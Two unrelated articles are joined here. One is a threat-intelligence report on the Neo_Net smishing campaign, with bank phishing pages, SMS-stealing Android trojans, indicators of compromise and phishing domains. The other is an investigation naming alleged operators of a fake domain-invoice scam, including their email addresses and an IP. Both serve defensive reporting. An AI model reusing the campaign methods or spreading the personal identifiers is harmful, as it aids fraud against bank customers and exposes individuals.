Fig 2: Demonstration of Ankarex’s SID functionality in the Ankarex News Channel

The SMS messages employed various scare tactics, such as claiming that the victim’s account had been accessed by an unauthorized device or that their card had been temporarily limited due to security concerns. The messages also contained a hyperlink to the threat actor’s phishing page.

The phishing pages were meticulously set up using Neo_Net’s panels, PRIV8, and implemented multiple defense measures, including blocking requests from non-mobile user agents and concealing the pages from bots and network scanners. These pages were designed to closely resemble genuine banking applications, complete with animations to create a convincing façade:

Fig 3: BBVA and Santander phishing pages
Fig 3: BBVA and Santander phishing pages

Upon submission of their credentials, the victims’ information was surreptitiously exfiltrated to a designated Telegram chat via the Telegram Bot API, granting the threat actors unrestricted access to the stolen data, including the victims’ IP addresses and user agents.

Neo_Net’s affiliates discussing captured credentials and the corresponding bank account
Fig 4: Neo_Net’s affiliates discussing captured credentials and the corresponding bank account

Subsequently, the threat actors employed various techniques to circumvent the Multi-Factor Authentication (MFA) mechanisms commonly employed by banking applications. One such approach involved coaxing victims into installing a purported security application for their bank account on their Android devices.

Fig 5: Android application impersonating ING
Fig 5: Android application impersonating ING

However, this application served no legitimate security purpose and merely requested permissions to send and view SMS messages.

Fig 6: BBVA application showing the SMS permission request after victim clicks on “Actualizar” button
Fig 6: BBVA application showing the SMS permission request after victim clicks on “Actualizar” button

In reality, these Android trojans functioned as modified versions of the publicly available Android SMS spyware known as SMS Eye. Some threat actors further obfuscated the trojan using public packers to evade detection by anti-malware solutions. These Android trojans covertly exfiltrated incoming SMS messages to a distinct dedicated Telegram chat.

Fig 7: Telegram messages showing exfiltrated BBVA OTPs
Fig 7: Telegram messages showing exfiltrated BBVA OTPs

The exfiltrated messages could then be utilized to bypass MFA on the targeted accounts by capturing One-Time Passwords (OTPs). Additionally, the threat actors were also observed employing direct phone calls to victims, possibly to impersonate bank representatives and deceive victims into installing the Android spyware or divulging OTPs.

The threat actors employed this method to target clients of several prominent banks around the world.

The funds illicitly acquired from victims during the course of the year-long operation amounted to a minimum of 350,000 EUR. However, it is probable that the actual sum is significantly higher, as older operations and transactions that do not involve SMS confirmation messages may not be fully accounted for due to limited visibility.

Neo_Net

Neo_Net, the prominent actor responsible for the global cybercrime campaign, has been active in the cybersecurity landscape at least since early 2021. He maintains a public GitHub profile under the name “notsafety” and a Telegram account that showcases his work and identifies him as the founder of Ankarex, a Smishing-as-a-Service platform.

Fig 8: Neo_Net’s Telegram profile
Fig 8: Neo_Net’s Telegram profile

Through his contributions on Telegram, Neo_Net has been linked to the “macosfera.com” forum, a Spanish-language IT forum. Email addresses registered with the forum’s domain were found in relation to several phishing panels created by Neo_Net, targeting Spanish banks and other institutions. These email addresses were used as usernames for the panels, suggesting that Neo_Net may have collaborated with individuals from this forum to set up his infrastructure. The phishing panels also clearly indicate Neo_Net as the creator, with his signature on top of the php files.

Fig 9: Phishing panels with links to macosfera[.]com (VirusTotal)
Fig 9: Phishing panels with links to macosfera[.]com (VirusTotal)

Ankarex

Neo_Net’s main creation is the Ankarex Smishing-as-a-Service platform, which has been active since at least May 2022. The Ankarex News Channel on Telegram, which advertises the service, currently has 1700 subscribers and regularly posts updates about the software, as well as limited offers and giveaways.

Fig 10: Halloween offer for 15% extra funds when recharging the account
Fig 10: Halloween offer for 15% extra funds when recharging the account

The service itself is accessible at ankarex[.]net, and once registered, users can upload funds using cryptocurrency transfers and launch their own Smishing campaigns by specifying the SMS content and target phone numbers. Ankarex currently targets 9 countries but has historically operated in additional regions.

Fig 11: Ankarex target countries and prices list
Fig 11: Ankarex target countries and prices list

In addition to the Smishing service, Neo_Net has also offered leads, including victims’ names, email addresses, IBANs, and phone numbers for sale on the Ankarex Channel. He has also advertised his Android SMS spyware service to selected members. Notably, every channel created to exfiltrate the captured SMS messages has Neo_Net listed as an administrator, and several package names of the Android trojans allude to their creator with names such as com.neonet.app.reader. It is likely that Neo_Net rented his infrastructure to affiliates, some of whom have been observed working with him on multiple unique campaigns, allowing them to conduct phishing and funds transfers independently.

Fig 12: Neo_Net demonstrating Ankarex on his own phone and exhibiting remarkable OPSEC throughout his campaigns
Fig 12: Neo_Net demonstrating Ankarex on his own phone and exhibiting remarkable OPSEC throughout his campaigns

Throughout his year-long operation, Neo_Net has been traced back to several unique IP addresses, indicating that he currently resides in Mexico. Neo_Net primarily operates in Spanish-speaking countries and communicates predominantly in Spanish with his affiliates. Communication in the Ankarex channel is almost exclusively done in Spanish.

However, Neo_Net has also been observed collaborating with non-Spanish speakers, including another cybercriminal identified by the Telegram handle devilteam666. This particular operation involved the use of Google Ads targeting crypto wallet owners, and devilteam666 continues to offer malicious Google Ads services on his Telegram channel.

Conclusion

Despite employing mostly unsophisticated tools and techniques, such as simple SMS spyware and phishing panels, Neo_Net and his affiliates have managed to steal hundreds of thousands of euros and compromise the personally identifiable information (PII) of thousands of victims worldwide. The success of their campaigns can be attributed to the highly targeted nature of their operations, often focusing on a single bank, and copying their communications to impersonate bank agents. Furthermore, due to the simplicity of SMS spyware, it can be difficult to detect, as it only requires permission to send and view SMS messages.

Neo_Net has also been observed reusing compromised PII for further profit. A significant amount of eCrime against mobile users in Spain over the past two years can be directly traced back to Neo_Net’s operation, including his phishing panels, Smishing-as-a-Service platform, and Android trojans.

These campaigns highlight that while Multi-Factor Authentication is robust, it can be circumvented if it relies on SMS, and that physical tokens or external applications would provide better protection in such cases.

Acknowledgments

Special thanks go to @malwrhunterteam who posted about several samples used in this campaign on his Twitter account.

Appendix A: Targeted Financial Institutions

  • Spain: Santander, BBVA, CaixaBank, Sabadell, ING España, Unicaja, Kutxabank, Bankinter, Abanca, Laboral Kutxa, Ibercaja, BancaMarch, CajaSur, OpenBank, Grupo Caja Rural, Cajalmendralejo, MoneyGo, Cecabank, Cetelem, Colonya, Self Bank, Banca Pueyo
  • France: Crédit Agricole, Caisse d’Epargne, La Banque postale, Boursorama, Banque de Bretagne
  • Greece: National Bank of Greece
  • Germany: Sparkasse, Deutsche Bank, Commerzbank
  • United Kingdom: Santander UK
  • Austria: BAWAG P.S.K.
  • Netherlands: ING
  • Poland: PKO Bank Polski
  • Chile: BancoEstado, Scotiabank (Cencosud Scotiabank), Santander (officebanking), Banco Ripley, Banco de Chile, Banco Falabella, Banco de Crédito e Inversiones, Itaú CorpBanca
  • Colombia: Bancolombia
  • Venezuela: Banco de Venezuela
  • Peru: BBVA Peru
  • Ecuador: Banco Pichincha
  • Panama: Zinli
  • USA: Prosperity Bank, Greater Nevada Credit Union
  • Australia: CommBank

Appendix B

Indicators of Compromise

APK SHA1 Hashes Main Activity Name Impersonated Institution
de8929c1a0273d0ed0dc3fc55058e0cb19486b3c com.neonet.app.reader.MainActivity BBVA
b344fe1bbb477713016d41d996c0772a308a5146 com.neonet.app.reader.MainActivity Laboral Kutxa
8a099af61f1fa692f45538750d42aab640167fd2 com.neonet.app.reader.MainActivity Correos
ab14161e243d478dac7a83086ed4839f8ad7ded8 com.neonet.app.reader.MainActivity BBVA
ded2655512de7d3468f63f9487e16a0bd17818ff com.neonet.app.reader.MainActivity CaixaBank
a5208de82def52b4019a6d3a8da9e14a13bc2c43 com.neonet.app.reader.MainActivity CaixaBank
21112c1955d131fa6cab617a3d7265acfab783c2 com.neonet.app.reader.MainActivity Openbank
6ea53a65fe3a1551988c6134db808e622787e7f9 com.neonet.app.reader.MainActivity Unicaja
62236a501e11d5fbfe411d841caf5f2253c150b8 com.neonet.app.reader.MainActivity BBVA
7f0c3fdbfcdfc24c2da8aa3c52aa13f9b9cdda84 com.neonet.app.reader.MainActivity BBVA
f918a6ecba56df298ae635a6a0f008607b0420b9 com.neonet.app.reader.MainActivity Santander
ffbcdf915916595b96f627df410722cee5b83f13 com.neonet.app.reader.MainActivity BBVA
7b4ab7b2ead7e004c0d93fe916af39c156e0bc61 com.neonet.app.reader.MainActivity CajaSur
34d0faea99d94d3923d0b9e36ef9e0c48158e7a0 com.neonet.app.reader.MainActivity BBVA
e6c485551d4f209a0b7b1fa9aa78b7efb51be49b com.neonet.app.reader.MainActivity BBVA
1df3ed2e2957efbd1d87aac0c25a3577318b8e2a com.neonet.app.reader.MainActivity BBVA
6a907b8e5580a5067d9fb47ef21826f164f68f3f com.neonet.app.reader.MainActivity Grupo Caja Rural
5d1c7ff3d16ec770cf23a4d82a91358b9142d21a com.neonet.app.reader.MainActivity Grupo Caja Rural
86ad0123fa20b7c0efb6fe8afaa6a756a86c9836 com.neonet.app.reader.MainActivity Grupo Caja Rural
14a36f18a45348ad9efe43b20d049f3345735163 com.neonet.app.reader.MainActivity Cajalmendralejo
b506503bb71f411bb34ec8124ed26ae27a4834b9 com.neonet.app.reader.MainActivity BBVA
afe84fa17373ec187781f72c330dfb7bb3a42483 com.cannav.cuasimodo.jumper.actividades BBVA
445468cd5c298f0393f19b92b802cfa0f76c32d4 com.cannav.cuasimodo.jumper.actividades BBVA
8491ff15ad27b90786585b06f81a3938d5a61b39 com.cannav.cuasimodo.jumper.actividades BBVA
2714e0744ad788142990696f856c5ffbc7173cf4 com.cannav.cuasimodo.jumper.actividades BBVA
1ce0afe5e09b14f8aee6715a768329660e95121e com.cannav.cuasimodo.jumper.actividades BBVA
96a3600055c63576be9f7dc97c5b25f1272edd2b com.cannav.cuasimodo.jumper.actividades BBVA
9954ae7d31ea65cd6b8cbdb396e7b99b0cf833f4 com.cannav.cuasimodo.jumper.actividades BBVA
07159f46a8adde95f541a123f2dda6c49035aad1 com.cannav.cuasimodo.jumper.actividades BBVA
ab19a95ef3adcb83be76b95eb7e7c557812ad2f4 com.cannav.cuasimodo.jumper.actividades BBVA
db8eeab4ab2e2e74a34c47ad297039485ff75f22 com.cannav.cuasimodo.jumper.actividades BBVA
dbf0cec18caabeb11387f7e6d14df54c808e441d com.cannav.cuasimodo.jumper.actividades BBVA
69d38eed5dc89a7b54036cc7dcf7b96fd000eb92 com.cannav.cuasimodo.jumper.actividades BBVA
c38107addc00e2a2f5dcb6ea0cbce40400c23b49 com.cannav.cuasimodo.jumper.actividades BBVA
279048e07c25fd75c4cef7c64d1ae741e178b35b com.uklapon.mafin.chinpiling.actividades Bankinter
ef8c5d639390d9ba138ad9c2057524ff6e1398de BBVA
e7c2d0c80125909d85913dfb941bdc373d677326 ING
145bd67f94698cc5611484f46505b3dc825bd6cd BancoEstado

Phishing Domains

bbva.info-cliente[.]net
santander.esentregas[.]ga
bbva.esentregas[.]ga
correos.esentregas[.]ga

Appendix C: MITRE ATT&CK Tags

ID Technique Explanation
T1406.002 Obfuscated Files or Information: Software Packing Some APK files are packed and drop the unpacked dex file once executed
T1633.001 Virtualization/Sandbox Evasion: System Checks Some APK files have been modified and initially check for common sandbox names before unpacking
T1426 System Information Discovery The Sms Eye trojan collects the brand and model of the infected phone
T1636.004 Protected User Data: SMS Messages The Sms Eye trojan collects incoming SMS messages
T1437.001 Application Layer Protocol: Web Protocols The Sms Eye trojan exfiltrates SMS messages over HTTPS
T1481.003 Web Service: One-Way Communication The Sms Eye trojan uses the Telegram Bot API to exfiltrate SMS messages
T1521.002 Encrypted Channel: Asymmetric Cryptography The C2 channel is encrypted by TLS
T1646 Exfiltration Over C2 Channel The SMS messages are exfiltrated over the C2 channel

Who’s Behind the DomainNetworks Snail Mail Scam?

If you’ve ever owned a domain name, the chances are good that at some point you’ve received a snail mail letter which appears to be a bill for a domain or website-related services. In reality, these misleading missives try to trick people into paying for useless services they never ordered, don’t need, and probably will never receive. Here’s a look at the most recent incarnation of this scam — DomainNetworks — and some clues about who may be behind it.

The DomainNetworks mailer may reference a domain that is or was at one point registered to your name and address. Although the letter includes the words “marketing services” in the upper right corner, the rest of the missive is deceptively designed to look like a bill for services already rendered.

DomainNetworks claims that listing your domain with their promotion services will result in increased traffic to your site. This is a dubious claim for a company that appears to be a complete fabrication, as we’ll see in a moment.  But happily, the proprietors of this enterprise were not so difficult to track down.

The website Domainnetworks[.]com says it is a business with a post office box in Hendersonville, N.C., and another address in Santa Fe, N.M. There are a few random, non-technology businesses tied to the phone number listed for the Hendersonville address, and the New Mexico address was used by several no-name web hosting companies.

However, there is little connected to these addresses and phone numbers that get us any closer to finding out who’s running Domainnetworks[.]com. And neither entity appears to be an active, official company in their supposed state of residence, at least according to each state’s Secretary of State database.

The Better Business Bureau listing for DomainNetworks gives it an “F” rating, and includes more than 100 reviews by people angry at receiving one of these scams via snail mail. Helpfully, the BBB says DomainNetworks previously operated under a different name: US Domain Authority LLC.

DomainNetworks has an “F” reputation with the Better Business Bureau.

Copies of snail mail scam letters from US Domain Authority posted online show that this entity used the domain usdomainauthority[.]com, registered in May 2022. The Usdomainauthority mailer also featured a Henderson, NC address, albeit at a different post office box.

Usdomainauthority[.]com is no longer online, and the site seems to have blocked its pages from being indexed by the Wayback Machine at archive.org. But searching on a long snippet of text from DomainNetworks[.]com about refund requests shows that this text was found on just one other active website, according to publicwww.com, a service that indexes the HTML code of existing websites and makes it searchable.

A deceptive snail mail solicitation from DomainNetwork’s previous iteration — US Domain Authority. Image: Joerussori.com

That other website is a domain registered in January 2023 called thedomainsvault[.]com, and its registration details are likewise hidden behind privacy services. Thedomainsvault’s “Frequently Asked Questions” page is quite similar to the one on the DomainNetworks website; both begin with the question of why the company is sending a mailer that looks like a bill for domain services.

Thedomainsvault[.]com includes no useful information about the entity or people who operate it; clicking the “Contact-us” link on the site brings up a page with placeholder Lorem Ipsum text, a contact form, and a phone number of 123456789.

However, searching passive DNS records at DomainTools.com for thedomainsvault[.]com shows that at some point whoever owns the domain instructed incoming email to be sent to ubsagency@gmail.com.

The first result that currently pops up when searching for “ubsagency” in Google is ubsagency[.]com, which says it belongs to a Las Vegas-based Search Engine Optimization (SEO) and digital marketing concern generically named both United Business Service and United Business Services. UBSagency’s website is hosted at the same Ann Arbor, Mich. based hosting firm (A2 Hosting Inc) as thedomainsvault[.]com.

UBSagency’s LinkedIn page says the company has offices in Vegas, Half Moon Bay, Calif., and Renton, Wash. But once again, none of the addresses listed for these offices reveal any obvious clues about who runs UBSagency. And once again, none of these entities appear to exist as official businesses in their claimed state of residence.

Searching on ubsagency@gmail.com in Constella Intelligence shows the address was used sometime before February 2019 to create an account under the name “SammySam_Alon” at the interior decorating site Houzz.com. In January 2019, Houzz acknowledged that a data breach exposed account information on an undisclosed number of customers, including user IDs, one-way encrypted passwords, IP addresses, city and ZIP codes, as well as Facebook information.

SammySam_Alon registered at Houzz using an Internet address in Huntsville, Ala. (68.35.149.206). Constella says this address was associated with the email tropicglobal@gmail.com, which also is tied to several other “Sammy” accounts at different stores online.

Constella also says a highly unique password re-used by tropicglobal@gmail.com across numerous sites was used in connection with just a few other email accounts, including shenhavgroup@gmail.com, and distributorinvoice@mail.com.

The shenhavgroup@gmail.com address was used to register a Twitter account for a Sam Orit Alon in 2013, whose account says they are affiliated with the Shenhav Group. According to DomainTools, shenhavgroup@gmail.com was responsible for registering roughly two dozen domains, including the now-defunct unitedbusinessservice[.]com.

Constella further finds that the address distributorinvoice@mail.com was used to register an account at whmcs.com, a web hosting platform that suffered a breach of its user database several years back. The name on the WHMCS account was Shmuel Orit Alon, from Kidron, Israel.

UBSagency also has a Facebook page, or maybe “had” is the operative word because someone appears to have defaced it. Loading the Facebook page for UBSagency shows several of the images have been overlaid or replaced with a message from someone who is really disappointed with Sam Alon.

“Sam Alon is a LIAR, THIEF, COWARD AND HAS A VERY SMALL D*CK,” reads one of the messages:

The current Facebook profile page for UBSagency includes a logo that is similar to the DomainNetworks logo.

The logo in the UBSagency profile photo includes a graphic of what appears to be a magnifying glass with a line that zig-zags through bullet points inside and outside the circle, a unique pattern that is remarkably similar to the logo for DomainNetworks:

The logos for DomainNetworks (left) and UBSagency.

Constella also found that the same Huntsville IP address used by Sam Alon at Houzz was associated with yet another Houzz account, this one for someone named “Eliran.”

The UBSagency Facebook page features several messages from an Eliran “Dani” Benz, who is referred to by commenters as an employee or partner with UBSagency. The last check-in on Benz’s profile is from a beach at Rishon Le Siyon in Israel earlier this year.

Neither Mr. Alon nor Mr. Benz responded to multiple requests for comment.

It may be difficult to believe that anyone would pay an invoice for a domain name or SEO service they never ordered. However, there is plenty of evidence that these phony bills often get processed by administrative personnel at organizations that end up paying the requested amount because they assume it was owed for some services already provided.

In 2018, KrebsOnSecurity published How Internet Savvy are Your Leaders?, which examined public records to show that dozens of cities, towns, school districts and even political campaigns across the United States got snookered into paying these scam domain invoices from a similar scam company called WebListings Inc.

In 2020, KrebsOnSecurity featured a deep dive into who was likely behind the WebListings scam, which had been sending out these snail mail scam letters for over a decade. That investigation revealed the scam’s connection to a multi-level marketing operation run out of the U.K., and to two brothers living in Scotland.